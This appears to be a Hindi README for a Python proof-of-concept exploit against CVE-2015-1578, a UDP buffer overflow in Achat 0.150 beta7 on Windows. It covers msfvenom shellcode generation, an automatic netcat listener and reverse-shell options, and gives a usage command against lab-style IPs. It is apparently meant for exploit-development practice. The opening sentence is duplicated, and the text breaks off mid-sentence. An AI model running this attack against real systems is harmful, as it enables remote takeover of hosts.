
यह CVE-2015-1578 के लिए एक प्रमाण-अवधारणा शोषण है, जो विंडोज़ पर Achat 0.150 beta7 में बफर ओवरफ्लो भेद्यता है। शोषण एक निर्मित UDP पैकेट के माध्यम से दूरस्थ कोड निष्पादन की ओर ले जाता है।
यह CVE-2015-1578 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट है, जो विंडोज पर Achat 0.150 beta7 में एक बफर ओवरफ्लो कमजोरी है। इसका दोहन एक निर्मित UDP पैकेट के माध्यम से रिमोट कोड निष्पादन की ओर ले जाता है।
यह PoC एक साफ, न्यूनतम और अच्छी तरह से संरचित एक्सप्लॉइट विकास उदाहरण के रूप में कार्य करने के लिए है। यह प्रदर्शित करता है:
msfvenom के माध्यम से गतिशील शेलकोड निर्माणmsfvenom (Metasploit Framework का हिस्सा)rlwrap (बेहतर Netcat उपयोगिता के लिए)msfvenom का उपयोग करके गतिशील रूप से यूनिकोड-एन्कोडेड पेलोड बनाता हैrlwrap nc का उपयोग करके स्वचालित रूप से एक लिसनर शुरू करता है-i <target_ip> लक्ष्य IP पता (आवश्यक)
-l, --lhost <listener_ip> रिवर्स शेल के लिए स्थानीय होस्ट IP (आवश्यक)
-p, --lport <port> रिवर्स शेल के लिए स्थानीय पोर्ट (आवश्यक)
--rport <port> लक्ष्य पर रिमोट UDP पोर्ट (डिफ़ॉल्ट: 9256)
python3 chatter.py -i 10.10.10.74 -l 10.10.16.7 -p 9393
इससे निम्नलिखित होंगे: